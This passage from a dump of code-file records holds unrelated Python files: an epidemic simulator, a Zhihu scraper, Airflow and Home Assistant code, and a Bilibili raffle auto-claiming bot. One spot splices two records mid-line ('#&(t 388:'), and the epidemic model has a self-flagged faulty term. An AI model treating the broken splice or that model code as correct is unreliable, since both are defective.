#Rate-of-change equations to solve\r\n    S, E, A, I, H, G, R, V, FV, D = y\r\n    dSdt = (-beta(t) * S * (pe*E+pa*A+pi*I+ph*H+pg*G) / N) -(v(t)*w*S) +lamda -(mu*S) #v(t)*S vaccinated at time t; only vaccination of susceptibles is effective\r\n    dEdt = (beta(t) * (S+FV) * (pe*E+pa*A+pi*I+ph*H+pg*G) / N) - ((deltaa+deltai+mu) * E)\r\n    dAdt = deltaa*E - (gammaa+alfaa+mu)*A\r\n    dIdt = deltai * E - (sigmah +sigmag+gammai+alfai+mu)*I\r\n    dHdt = sigmah*I - (gammah+alfah+mu)*H*mu # the mu factor makes this grow a lot\r\n    dGdt = sigmag*I - (gammag+alfag+mu)*G\r\n    dRdt = gammaa*A + gammai * I + gammah*H + gammag*G - mu*R\r\n    dVdt = v(t)*q*w*S- mu*V #vaccinations have a time component\r\n    dFVdt= v(t)*(1-q)*w*S - (beta(t)/N)*FV*(pe*E+pa*A+pi*I+ph*H+pg*G) - mu*FV #time component\r\n    N = S+E+A+I+H+G+R+V+FV\r\n    dDdt = mu * N\r\n\r\n    return dSdt, dEdt, dAdt, dIdt, dHdt, dGdt, dRdt, dVdt, dFVdt, dDdt\r\n\r\n#The sidebar does NOT refresh every time the file reloads!!!\r\nN = st.sidebar.number_input('Total Population',min_value=1_000,max_value=100_000_000,value=1_000_000,step=1_000)\r\n\r\nbeta_0 = st.sidebar.number_input('Potentially Dangerous Contact Rate \u03B2',min_value=0.0,max_value=1.0,value=0.7)\r\nlamda = st.sidebar.number_input('Birth Rate \u039B',min_value=0.0,max_value=1.0,value=0.01)\r\n
alfag = st.sidebar.number_input('Disease-induced Mortality Rate for ICU patients \u03B1₉',min_value=0.0,max_value=1.0,value=0.01)\r\nsigmag = st.sidebar.number_input('ICU Admission Rate \u03C3₉',min_value=0.0,max_value=1.0,value=0.01)\r\n\r\n\r\n#For the lockdown:\r\n\r\ndef beta(t):\r\n    return beta_0\r\n\r\nif st.sidebar.checkbox('Is there vaccination?'):\r\n    vac = st.sidebar.number_input('Vaccination Rate \u03BD',min_value=0.0,max_value=1.0, value=5*(10e-3))\r\n    dia = st.sidebar.number_input('Vaccination Start (Day)',1,None,50,1)\r\n    q = st.sidebar.number_input('Efficacy q',min_value=0.0,max_value=1.0,value=0.9)\r\n    w = st.sidebar.number_input('Campaign Adherence w',min_value=0.0,max_value=1.0,value=0.6)\r\nelse:\r\n    vac=0\r\n    dia=0\r\n    q=0\r\n    w=0\r\ndef v(t):\r\n    return vac if (t>=dia) else 0.0 #Vaccination rate\r\n#&(t 388:\r\n            print(\"{} {}\".format('answer:',outline))\r\n            time.sleep(1)\r\n\r\n\r\n\r\ndef main():\r\n    id = input('Enter the question url: ')\r\n    id = id.split('/')  # split the url string\r\n    id = id[-1]  # take the last slice\r\n    list_url = get_urls(id)\r\n    print_content(list_url)\r\n\r\nmain()","sub_path":"zhihu/zhihureping.py","file_name":"zhihureping.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"371827317","text":"import Zero\nimport Events\nimport Property\nimport VectorMath\nimport math\n\nVector3 = VectorMath.Vec3\nQuaternion = VectorMath.Quaternion\n\nclass SedrickBody:\n    def DefineProperties(self):\n        self.IsRight = Property.Bool(False)\n        self.IsLeft = Property.Bool(False)\n        self.LeftRight = Property.Bool(False)\n\n        self.Start = Property.Bool(True)\n\n        self.BodyX = Property.Float(0)\n        self.BodyY = Property.Float(0)\n        self.BodyZ = Property.Float(0)\n\n    def Initialize(self, initializer):\n        Zero.Connect(self.Space, Events.LogicUpdate, self.OnLogicUpdate)\n\n    def OnLogicUpdate(self, UpdateEvent):\n        Parent = self.Owner.Parent\n        Position = self.Owner.Transform.Translation\n\n        MouseScreenPosition = Zero.Mouse.ScreenPosition\n        WorldMousePosition = self.LevelSettings.CameraViewport.ScreenToWorldZPlane(MouseScreenPosition, 0)\n        Distance = WorldMousePosition - self.Owner.Transform.WorldTranslation\n\n        RotationAngles = Quaternion(0, 0, 0)\n\n        if(self.Start is True):\n            self.BodyX = Position.x\n            self.BodyY = Position.y\n            self.BodyZ = Position.z\n            self.Start = False\n\n        if(Parent.SedrickPlayerController.Side is True):\n\n            self.Owner.Orientation.LookAtPoint(Vector3(WorldMousePosition.x, WorldMousePosition.y, 0))\n\n        if(Parent.SedrickPlayerController.Side2 is True):\n            self.Owner.Orientation.LookAtPoint(Vector3(WorldMousePosition.x, WorldMousePosition.y, 0))\n\n        #print(self.Owner.Orientation.AbsoluteAngle)\n        #print(self.Owner.Orientation.Rotation)\n\n        if(Distance.x < 0):\n            self.IsLeft = True\n            self.IsRight = False\n            if(self.IsLeft is True):\n                if(self.LeftRight is True):\n                    #print(\"Right\")\n                    RotationAngles.y = 1\n                    self.Owner.Transform.Rotation = RotationAngles\n                    self.LeftRight = False\n\n        if(Distance.x > 0):\n            self.IsLeft = False\n            self.IsRight = True\n            if(self.IsRight is True):\n                if(self.LeftRight is False):\n                    #print(\"Left\")\n                    RotationAngles.y = 0\n                    self.Owner.Transform.Rotation = RotationAngles\n                    self.LeftRight = True\n\n        if(Zero.Keyboard.KeyIsDown(Zero.Keys.S) and not Zero.Keyboard.KeyIsDown(Zero.Keys.A) and not Zero.Keyboard.KeyIsDown(Zero.Keys.D)):\n            self.Owner.Transform.Translation = Vector3(self.BodyX, self.BodyY - 0.09, self.BodyZ)\n
            Parent.BoxCollider.Offset = Vector3(0.02, 0.07, 0)\n            Parent.BoxCollider.Size = Vector3(0.1, 0.3, 10)\n\n        elif(Zero.Keyboard.KeyIsDown(Zero.Keys.Space) or Parent.SedrickPlayerController.OnGround is False):\n            self.Owner.Transform.Translation = Vector3(self.BodyX, self.BodyY - 0.02, self.BodyZ)\n\n        else:\n            self.Owner.Transform.Translation = Vector3(self.BodyX, self.BodyY, self.BodyZ)\n            Parent.BoxCollider.Offset = Vector3(0.02, 0.15, 0)\n            Parent.BoxCollider.Size = Vector3(0.1, 0.5, 10)\n\nZero.RegisterComponent(\"SedrickBody\", SedrickBody)","sub_path":"Content/SedrickBody.py","file_name":"SedrickBody.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"555112700","text":"\"\"\"Support for MelView device sensors.\"\"\"\nimport logging\n\nfrom pymelview import DEVICE_TYPE_ATA\n\nfrom homeassistant.const import (\n    DEVICE_CLASS_TEMPERATURE,\n    TEMP_CELSIUS,\n    STATE_ON,\n    STATE_OFF\n)\nfrom homeassistant.components.binary_sensor import DEVICE_CLASS_PROBLEM\nfrom homeassistant.helpers.entity import Entity\n\nfrom . import MelViewDevice\nfrom .const import DOMAIN, MEL_DEVICES\n\nATTR_MEASUREMENT_NAME = \"measurement_name\"\nATTR_ICON = \"icon\"\nATTR_UNIT = \"unit\"\nATTR_DEVICE_CLASS = \"device_class\"\nATTR_VALUE_FN = \"value_fn\"\nATTR_ENABLED_FN = \"enabled\"\n\nATTR_STATE_DEVICE_ID = \"device_id\"\nATTR_STATE_DEVICE_LAST_SEEN = \"last_communication\"\n\nATA_SENSORS = {\n    \"room_temperature\": {\n        ATTR_MEASUREMENT_NAME: \"Room Temperature\",\n        ATTR_ICON: \"mdi:thermometer\",\n        ATTR_UNIT: TEMP_CELSIUS,\n        ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,\n        ATTR_VALUE_FN: lambda x: x.device.room_temperature,\n        ATTR_ENABLED_FN: lambda x: True,\n    },\n}\n\nATA_BINARY_SENSORS = {\n    \"error_state\": {\n        ATTR_MEASUREMENT_NAME: \"Error State\",\n        ATTR_ICON: None,\n        ATTR_UNIT: None,\n        ATTR_DEVICE_CLASS: DEVICE_CLASS_PROBLEM,\n        ATTR_VALUE_FN: lambda x: x.error_state,\n        ATTR_ENABLED_FN: lambda x: True,\n    },\n}\n\n_LOGGER = logging.getLogger(__name__)\n\n\nasync def async_setup_sensors(hass, entry, async_add_entities, type_binary, init_status=False):\n    \"\"\"Set up MelView device sensors and binary sensors based on config_entry.\"\"\"\n    entry_config = hass.data[DOMAIN][entry.entry_id]\n    ata_sensors = ATA_BINARY_SENSORS if type_binary else ATA_SENSORS\n\n    mel_devices = entry_config.get(MEL_DEVICES)\n    async_add_entities(\n        [\n            MelDeviceSensor(mel_device, measurement, definition, type_binary)\n            for measurement, definition in ata_sensors.items()\n            for mel_device in mel_devices[DEVICE_TYPE_ATA]\n            if definition[ATTR_ENABLED_FN](mel_device)\n        ],\n        init_status,\n    )\n\n\nasync def async_setup_entry(hass, entry, async_add_entities):\n    \"\"\"Set up MelView device sensors based on config_entry.\"\"\"\n    await async_setup_sensors(hass, entry, async_add_entities, False)\n\n\nclass MelDeviceSensor(Entity):\n    \"\"\"Representation of a Sensor.\"\"\"\n\n    def __init__(self, device: MelViewDevice, measurement, definition, isbinary):\n        \"\"\"Initialize the sensor.\"\"\"\n        self._api = device\n        self._name_slug = device.name\n        self._measurement = measurement\n        self._def = definition\n        self._isbinary = isbinary\n\n    @property\n    def unique_id(self):\n        \"\"\"Return a unique ID.\"\"\"\n        return f\"melview_custom_heatpump_{self._api.device.device_id}\"\n\n    @property\n    def icon(self):\n        \"\"\"Return the icon to use in the frontend, if any.\"\"\"\n        return self._def[ATTR_ICON]\n\n    @property\n    def name(self):\n        \"\"\"Return the name of the sensor.\"\"\"\n
f\"{self._name_slug} {self._def[ATTR_MEASUREMENT_NAME]}\"\n\n @property\n def is_on(self):\n \"\"\"Return the state of the binary sensor.\"\"\"\n if self._isbinary:\n return self._def[ATTR_VALUE_FN](self._api)\n\n return False\n\n @property\n def state(self):\n \"\"\"Return the state of the sensor.\"\"\"\n if self._isbinary:\n return STATE_ON if self.is_on else STATE_OFF\n\n return self._def[ATTR_VALUE_FN](self._api)\n\n @property\n def unit_of_measurement(self):\n \"\"\"Return the unit of measurement.\"\"\"\n return self._def[ATTR_UNIT]\n\n @property\n def device_class(self):\n \"\"\"Return device class.\"\"\"\n return self._def[ATTR_DEVICE_CLASS]\n\n async def async_update(self):\n \"\"\"Retrieve latest state.\"\"\"\n await self._api.async_update()\n\n @property\n def device_info(self):\n \"\"\"Return a device description for device registry.\"\"\"\n return self._api.device_info\n\n @property\n def state_attributes(self):\n \"\"\"Return the optional state attributes.\"\"\"\n data = {\n ATTR_STATE_DEVICE_ID: self._api.device_id,\n }\n return data\n","sub_path":"custom_components/melview_custom/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"420282816","text":"import stdio\n\nstdio.writeln('Nhap so: ')\nso_input=stdio.readInt()\n\nsodao=0\ntam=so_input\n\nwhile tam>0:\n\t\n\tsodao= sodao*10 + tam%10\n\ttam=tam//10\n\t\t\nif so_input==sodao:\n\tstdio.writeln('So %d la do doi xung' %so_input)\nelse:\n\tstdio.writeln('So %d khong phai la so doi xung' %so_input)\t","sub_path":"basic/Tuan5/Bai2.py","file_name":"Bai2.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"304562456","text":"from airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom datetime import datetime, timedelta\nfrom airflow.contrib.hooks.ssh_hook import SSHHook \nfrom airflow.operators.latest_only_operator import LatestOnlyOperator\nfrom airflow.contrib.operators.ssh_operator import SSHOperator\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime(2019, 10, 2),\n 'email': ['airflow@example.com'],\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n # 'queue': 'bash_queue',\n # 'pool': 'backfill',\n # 'priority_weight': 10,\n # 'end_date': datetime(2016, 1, 1),\n}\n\ndag = DAG(\n 'KillerWF3-v1.0.1', \n default_args=default_args, \n schedule_interval='0 0 2 * *'\n )\n\nlatest_only = LatestOnlyOperator(\n task_id='latest_only', \n dag=dag\n )\n\ninfa_wait_WF_10_bash =\"\"\"\ncd /cygdrive/c/Users/DRECRAP/Desktop\n./WFwrapper.sh DRECRAP Wait_WF_10; echo $?\n\"\"\"\n\nop1 = SSHOperator(\n task_id=\"01_infa_wait_WF_10\",\n ssh_hook=SSHHook(ssh_conn_id='infa_ssh'),\n command=infa_wait_WF_10_bash,\n dag=dag)\n\nop2 = SSHOperator(\n task_id=\"02_infa_wait_WF_10\",\n ssh_hook=SSHHook(ssh_conn_id='infa_ssh'),\n command=infa_wait_WF_10_bash,\n dag=dag)\n\nlatest_only >> op1 >> op2","sub_path":"KillerWF3-v1.0.1.py","file_name":"KillerWF3-v1.0.1.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"23697540","text":"from bilibili import bilibili\nfrom statistics import Statistics\nfrom printer import Printer\nimport utils\nimport asyncio\nimport random\n\n\nclass Rafflehandler:\n __slots__ = 
    __slots__ = ('queue_raffle',)\n    instance = None\n\n    def __new__(cls, *args, **kw):\n        if not cls.instance:\n            cls.instance = super(Rafflehandler, cls).__new__(cls, *args, **kw)\n            cls.instance.queue_raffle = asyncio.Queue()\n        return cls.instance\n    \n    async def run(self):\n        while True:\n            raffle = await self.queue_raffle.get()\n            await asyncio.sleep(3)\n            list_raffle0 = [self.queue_raffle.get_nowait() for i in range(self.queue_raffle.qsize())]\n            list_raffle0.append(raffle)\n            list_raffle = list(set(list_raffle0))\n            \n            # print('deduplication done')\n            # if len(list_raffle) != len(list_raffle0):\n            #     print('the dedup filter did something')\n            \n            tasklist = []\n            for i in list_raffle:\n                task = asyncio.ensure_future(i[0](*i[1]))\n                tasklist.append(task)\n            \n            await asyncio.wait(tasklist, return_when=asyncio.ALL_COMPLETED)\n    \n    @staticmethod\n    def Put2Queue(func, value):\n        # print('welcome to appending')\n        Rafflehandler.instance.queue_raffle.put_nowait((func, value))\n        # print('appended')\n        return\n    \n    @staticmethod\n    def getlist():\n        print('current TV task queue size', Rafflehandler.instance.queue_raffle.qsize())\n    \n\nasync def handle_1_TV_raffle(num, real_roomid, raffleid):\n    # print('joining')\n    await asyncio.sleep(random.uniform(0.5, min(30, num * 1.3)))\n    json_response2 = await bilibili.get_gift_of_TV(real_roomid, raffleid)\n    Printer().printlist_append(['join_lottery', 'small TV', 'user', f'joined the small TV raffle of room {real_roomid:^9}'], True)\n    Printer().printlist_append(\n        ['join_lottery', 'small TV', 'user', \"# small TV raffle status: \", json_response2['msg']])\n    # -400: raffle does not exist\n    # -500: server busy\n    if not json_response2['code']:\n        Statistics.append_to_TVlist(raffleid, real_roomid)\n        return True\n    elif json_response2['code'] == -500:\n        print('# -500 server busy, will retry later')\n        return False\n    else:\n        print(json_response2)\n        return True\n    \n    \nasync def handle_1_captain_raffle(num, roomid, raffleid):\n    await asyncio.sleep(random.uniform(0.5, min(30, num * 1.3)))\n    json_response2 = await bilibili.get_gift_of_captain(roomid, raffleid)\n    if not json_response2['code']:\n        print(\"# got the governor reward of room %s: \" %(roomid), json_response2['data']['message'])\n        Statistics.append_to_captainlist()\n    else:\n        print(json_response2)\n    return True\n    \n    \nasync def handle_1_activity_raffle(num, giftId, text1, text2, raffleid):\n    # print('joining')\n    await asyncio.sleep(random.uniform(0.5, min(30, num * 1.3)))\n    json_response1 = await bilibili.get_gift_of_events_app(text1, text2, raffleid)\n    json_pc_response = await bilibili.get_gift_of_events_web(text1, text2, raffleid)\n    \n    Printer().printlist_append(['join_lottery', '', 'user', f'joined the {bilibili.get_giftids_raffle(str(giftId))} event raffle of room {text1:^9}'], True)\n\n    if not json_response1['code']:\n        Printer().printlist_append(['join_lottery', '', 'user', \"# mobile event raffle result: \",\n                                    json_response1['data']['gift_desc']])\n        Statistics.add_to_result(*(json_response1['data']['gift_desc'].split('X')))\n    else:\n        print(json_response1)\n        Printer().printlist_append(['join_lottery', '', 'user', \"# mobile event raffle result: \", json_response1['message']])\n    \n    Printer().printlist_append(\n        ['join_lottery', '', 'user', \"# web event raffle status: \", json_pc_response['message']])\n    if not json_pc_response['code']:\n        Statistics.append_to_activitylist(raffleid, text1)\n    else:\n        print(json_pc_response)\n    return True\n\n    \nasync def handle_1_room_TV(real_roomid):\n    await asyncio.sleep(random.uniform(0.5, 1.5))\n    result = await utils.check_room_true(real_roomid)\n    if True in result:\n        Printer().printlist_append(['join_lottery', 'phishing alert', 'user', f'WARNING: phishing behavior detected in room {real_roomid:^9}'], True)\n    else:\n        # print(True)\n        await bilibili.post_watching_history(real_roomid)\n
        json_response = await bilibili.get_giftlist_of_TV(real_roomid)\n        # print(json_response['data']['list'])\n        checklen = json_response['data']['list']\n        list_available_raffleid = []\n        for j in checklen:\n            # await asyncio.sleep(random.uniform(0.5, 1))\n            # resttime = j['dtime']\n            raffleid = j['raffleId']\n            status = j['status']\n            if status == 1:\n                # print('not joined')\n                list_available_raffleid.append(raffleid)\n            elif status == 2:\n                # print('filtered')\n                pass\n            else:\n                print(checklen)\n        tasklist = []\n        num_available = len(list_available_raffleid)\n        for raffleid in list_available_raffleid:\n            task = asyncio.ensure_future(handle_1_TV_raffle(num_available, real_roomid, raffleid))\n            tasklist.append(task)\n        if tasklist:\n            raffle_results = await asyncio.gather(*tasklist)\n            if False in raffle_results:\n                print('busy response received, retrying later')\n                Rafflehandler.Put2Queue(handle_1_room_TV, (real_roomid,))\n\nasync def handle_1_room_activity(giftId, text1, text2):\n    await asyncio.sleep(random.uniform(0.5, 1.5))\n    result = await utils.check_room_true(text1)\n    if True in result:\n        Printer().printlist_append(['join_lottery', 'phishing alert', 'user', f'WARNING: phishing behavior detected in room {text1:^9}'], True)\n    else:\n        # print(True)\n        await bilibili.post_watching_history(text1)\n        json_response = await bilibili.get_giftlist_of_events(text1)\n        checklen = json_response['data']\n        list_available_raffleid = []\n        for j in checklen:\n            # await asyncio.sleep(random.uniform(0.5, 1))\n            resttime = j['time']\n            raffleid = j['raffleId']\n            if Statistics.check_activitylist(text1, raffleid):\n                list_available_raffleid.append(raffleid)\n        tasklist = []\n        num_available = len(list_available_raffleid)\n        for raffleid in list_available_raffleid:\n            task = asyncio.ensure_future(handle_1_activity_raffle(num_available, giftId, text1, text2, raffleid))\n            tasklist.append(task)\n        if tasklist:\n            raffle_results = await asyncio.gather(*tasklist)\n            if False in raffle_results:\n                print('busy response received, retrying later')\n                Rafflehandler.Put2Queue(handle_1_room_activity, (giftId, text1, text2))\n    \n\nasync def handle_1_room_captain(roomid):\n    await asyncio.sleep(random.uniform(0.5, 1.5))\n    result = await utils.check_room_true(roomid)\n    if True in result:\n        Printer().printlist_append(['join_lottery', 'phishing alert', 'user', f'WARNING: phishing behavior detected in room {roomid:^9}'], True)\n    else:\n        # print(True)\n        await bilibili.post_watching_history(roomid)\n        num = 0\n        while True:\n            json_response1 = await bilibili.get_giftlist_of_captain(roomid)\n            # print(json_response1)\n            num = len(json_response1['data']['guard'])\n            if not num:\n                await asyncio.sleep(5)\n            else:\n                break\n        \n        list_available_raffleid = []\n        # after a guard reward is claimed its entry disappears from the list, so there is no status field; handled like this for consistency\n        for j in json_response1['data']['guard']:\n            id = j['id']\n            status = j['status']\n            if status == 1:\n                # print('not joined')\n                list_available_raffleid.append(id)\n            elif status == 2:\n                # print('filtered')\n                pass\n            else:\n                print(json_response1)\n        \n        tasklist = []\n        num_available = len(list_available_raffleid)\n        for raffleid in list_available_raffleid:\n            task = asyncio.ensure_future(handle_1_captain_raffle(num_available, roomid, raffleid))\n            tasklist.append(task)\n        if tasklist:\n            raffle_results = await asyncio.gather(*tasklist)\n            if False in raffle_results:\n                print('busy response received, retrying later')\n                Rafflehandler.Put2Queue(handle_1_room_captain, (roomid,))\n    \n    \n\n","sub_path":"rafflehandler.py","file_name":"rafflehandler.py","file_ext":"py","file_size_in_byte":8824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"293281540","text":"################################\n# deprecated\n################################\n\n
from common import redis_cli\n\nUSER_CACHE_LIMIT = 10000\nUSER_FOLLOWING_CACHE_LIMIT = 10000\nUSER_FANS_CACHE_LIMIT = 10000\nUSER_ARTICLE_CACHE_LIMIT = 10000\n\n\nARTICLE_COMMENT_CACHE_LIMIT = 10000  # number of articles whose hot comments are cached\nCOMMENT_REPLY_CACHE_LIMIT = 10000  # number of comments whose hot replies are cached\nCOMMENT_CONTENT_CACHE_LIMIT = 100  # cache limit per comment list\n\nARTICLE_CACHE_LIMIT = 50000\n\n\ndef clear_user_cache():\n    \"\"\"\n    Clear the user data cache, keeping only a limited number of recently active users\n    \"\"\"\n    r = redis_cli['user_cache']\n    size = r.zcard('user')\n    if size <= USER_CACHE_LIMIT:\n        return\n\n    end_index = size - USER_CACHE_LIMIT\n    user_id_li = r.zrange('user', 0, end_index-1)\n    user_cache_keys = []\n    for user_id in user_id_li:\n        user_cache_keys.append('user:{}'.format(user_id))\n    pl = r.pipeline()\n    pl.delete(*user_cache_keys)\n    pl.zrem('user', *user_id_li)\n    pl.execute()\n\n\ndef clear_user_following_cache():\n    \"\"\"\n    Clear the user following data\n    \"\"\"\n    r = redis_cli['user_cache']\n    size = r.zcard('user:following')\n    if size <= USER_FOLLOWING_CACHE_LIMIT:\n        return\n\n    end_index = size - USER_FOLLOWING_CACHE_LIMIT\n    user_id_li = r.zrange('user:following', 0, end_index - 1)\n    user_cache_keys = []\n    for user_id in user_id_li:\n        user_cache_keys.append('user:{}:following'.format(user_id))\n    pl = r.pipeline()\n    pl.delete(*user_cache_keys)\n    pl.zrem('user:following', *user_id_li)\n    pl.execute()\n\n\ndef clear_user_fans_cache():\n    \"\"\"\n    Clear the user fans data\n    \"\"\"\n    r = redis_cli['user_cache']\n    size = r.zcard('user:fans')\n    if size <= USER_FANS_CACHE_LIMIT:\n        return\n\n    end_index = size - USER_FANS_CACHE_LIMIT\n    user_id_li = r.zrange('user:fans', 0, end_index - 1)\n    user_cache_keys = []\n    for user_id in user_id_li:\n        user_cache_keys.append('user:{}:fans'.format(user_id))\n    pl = r.pipeline()\n    pl.delete(*user_cache_keys)\n    pl.zrem('user:fans', *user_id_li)\n    pl.execute()\n\n\ndef clear_user_article_cache():\n    \"\"\"\n    Clear the user article data\n    \"\"\"\n    r = redis_cli['user_cache']\n    size = r.zcard('user:art')\n    if size <= USER_ARTICLE_CACHE_LIMIT:\n        return\n\n    end_index = size - USER_ARTICLE_CACHE_LIMIT\n    user_id_li = r.zrange('user:art', 0, end_index - 1)\n    user_cache_keys = []\n    for user_id in user_id_li:\n        user_cache_keys.append('user:{}:art'.format(user_id))\n    pl = r.pipeline()\n    pl.delete(*user_cache_keys)\n    pl.zrem('user:art', *user_id_li)\n    pl.execute()\n\n\ndef clear_comment_cache():\n    \"\"\"\n    Clear the comment cache (including comment replies), keeping only a limited amount of the hottest comment data\n    \"\"\"\n    r = redis_cli['comm_cache']\n    pl = r.pipeline()\n\n    # clean up article comments\n    size = r.zcard('art:comm')\n\n    # clean up non-hot comments\n    if size > ARTICLE_COMMENT_CACHE_LIMIT:\n        end_index = size - ARTICLE_COMMENT_CACHE_LIMIT\n        article_id_li = r.zrange('art:comm', 0, end_index-1)\n        delete_keys = []\n        if article_id_li:\n            for article_id in article_id_li:\n\n                comment_id_li = r.zrange('art:{}:comm'.format(article_id), 0, -1)\n                if comment_id_li:\n                    for comment_id in comment_id_li:\n                        delete_keys.append('comm:{}'.format(comment_id))\n\n                delete_keys.append('art:{}:comm'.format(article_id))\n                delete_keys.append('art:{}:comm:figure'.format(article_id))\n\n        if delete_keys:\n            pl.delete(*delete_keys)\n        pl.zrem('art:comm', *article_id_li)\n        pl.execute()\n\n    # trim the number of cached hot comments\n    delete_keys = []\n    article_id_li = r.zrange('art:comm', 0, -1)\n    if article_id_li:\n        for article_id in article_id_li:\n            size = r.zcard('art:{}:comm'.format(article_id))\n            if size > COMMENT_CONTENT_CACHE_LIMIT:\n                end_index = size - ARTICLE_COMMENT_CACHE_LIMIT\n                comment_id_li = r.zrange('art:{}:comm'.format(article_id), 0, end_index - 1)\n                if comment_id_li:\n                    for comment_id in comment_id_li:\n                        delete_keys.append('comm:{}'.format(comment_id))\n    if delete_keys:\n
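        # drop the cached bodies of comments that fell outside the hot-comment window\n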
        r.delete(*delete_keys)\n\n    # clean up comment replies\n    size = r.zcard('comm:reply')\n\n    # clean up non-hot comment replies\n    if size > COMMENT_REPLY_CACHE_LIMIT:\n        end_index = size - COMMENT_REPLY_CACHE_LIMIT\n        comment_id_li = r.zrange('comm:reply', 0, end_index-1)\n        delete_keys = []\n        if comment_id_li:\n            for comment_id in comment_id_li:\n\n                reply_id_li = r.zrange('comm:{}:reply'.format(comment_id), 0, -1)\n                if reply_id_li:\n                    for reply_id in reply_id_li:\n                        delete_keys.append('comm:{}'.format(reply_id))\n\n                delete_keys.append('comm:{}:reply'.format(comment_id))\n                delete_keys.append('comm:{}:reply:figure'.format(comment_id))\n\n        if delete_keys:\n            pl.delete(*delete_keys)\n\n        pl.zrem('comm:reply', *comment_id_li)\n        pl.execute()\n\n    # trim the number of cached hot comment replies\n    delete_keys = []\n    comment_id_li = r.zrange('comm:reply', 0, -1)\n    if comment_id_li:\n        for comment_id in comment_id_li:\n            size = r.zcard('comm:{}:reply'.format(comment_id))\n            if size > COMMENT_CONTENT_CACHE_LIMIT:\n                end_index = size - ARTICLE_COMMENT_CACHE_LIMIT\n                reply_id_li = r.zrange('comm:{}:reply'.format(comment_id), 0, end_index - 1)\n                if reply_id_li:\n                    for reply_id in reply_id_li:\n                        delete_keys.append('comm:{}'.format(reply_id))\n    if delete_keys:\n        r.delete(*delete_keys)\n\n\ndef clear_article_cache():\n    \"\"\"\n    Clear the article cache\n    \"\"\"\n    r = redis_cli['art_cache']\n    size = r.zcard('art')\n    if size <= ARTICLE_CACHE_LIMIT:\n        return\n\n    end_index = size - ARTICLE_CACHE_LIMIT\n    article_id_li = r.zrange('art', 0, end_index - 1)\n    article_cache_keys = []\n    for article_id in article_id_li:\n        article_cache_keys.append('art:{}:info'.format(article_id.decode()))\n    # TODO: clear the article detail cache\n    pl = r.pipeline()\n    pl.delete(*article_cache_keys)\n    pl.zrem('art', *article_id_li)\n    pl.execute()\n\n\n\n","sub_path":"schedule/clear_cache.py","file_name":"clear_cache.py","file_ext":"py","file_size_in_byte":6406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"571676379","text":"import subprocess\nimport sys\nfrom argparse import ArgumentParser\n\nfrom mpi4py import MPI\n\nfrom ._plugin import MPI_SESSION_ARGUMENT\nfrom ._test_name_converter import get_filename\n\nparser = ArgumentParser()\nparser.add_argument(\"test_name\")\n\nargs = parser.parse_args()\n\ntry:\n    subprocess.check_output(\n        [sys.executable, \"-m\", \"pytest\", \"--color=yes\", MPI_SESSION_ARGUMENT]\n        + [args.test_name],\n        stderr=subprocess.STDOUT,\n        universal_newlines=True,\n    )\nexcept subprocess.CalledProcessError as error:\n    with open(\n        f\"{get_filename(args.test_name)}_{MPI.COMM_WORLD.Get_rank()}\", \"w\"\n    ) as f:\n        test_name = args.test_name.split(\":\")[-1]\n        output = error.output.split(\"\\n\")\n        for i in range(len(output)):\n            if test_name in output[i]:\n                break\n\n        output = \"\\n\".join(output[i + 1 : -2])\n        f.write(output)\n    sys.exit(error.returncode)\n","sub_path":"pytest_MPI/_print_capture.py","file_name":"_print_capture.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"429717138","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\n\n\nclass Message:\n\n    def __init__(self, db, **kwargs):\n        self.collection = db['messages']\n\n    async def save(self, user, msg, **kw):\n        result = await self.collection.insert({'user': user, 'msg': msg, 'time': datetime.now()})\n        return result\n\n    async def get_messages(self):\n        messages = self.collection.find().sort([('time', 1)])\n        result = []\n        for message in await messages.to_list(length=None):\n            result.append({\n
                '_id': str(message['_id']),\n                'user': message['user'],\n                'msg': message['msg'],\n                'time': str(message['time']),\n            })\n        return result\n","sub_path":"gbserver/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"45023363","text":"from django.utils.translation import ugettext_lazy as _\nfrom django.conf import settings\n\n# Default settings.. overwrite in your own settings.py\n\n# Planned feature.\nWIKI_USE_MARKUP_WIDGET = True\n\n####################\n# LOGIN PROTECTION #\n####################\n# Before setting the below parameters, please note that permissions can\n# be set in the django permission system on individual articles and their\n# child articles. In this way you can add a user group and give them\n# special permissions, be it on the root article or some other. Permissions\n# are inherited on lower levels.\n\n# Adds standard django login protection for viewing\nWIKI_REQUIRE_LOGIN_VIEW = getattr(settings, 'SIMPLE_WIKI_REQUIRE_LOGIN_VIEW',\n                                  False)\n\n# Adds standard django login protection for editing\nWIKI_REQUIRE_LOGIN_EDIT = getattr(settings, 'SIMPLE_WIKI_REQUIRE_LOGIN_EDIT',\n                                  True)\n\n####################\n# ATTACHMENTS      #\n####################\n\n# This should be a directory that's writable for the web server.\n# It's relative to the MEDIA_ROOT.\nWIKI_ATTACHMENTS = getattr(settings, 'SIMPLE_WIKI_ATTACHMENTS',\n                           'simplewiki/attachments/')\n\n# If false, attachments will completely disappear\nWIKI_ALLOW_ATTACHMENTS = getattr(settings, 'SIMPLE_WIKI_ALLOW_ATTACHMENTS',\n                                 True)\n\n# If 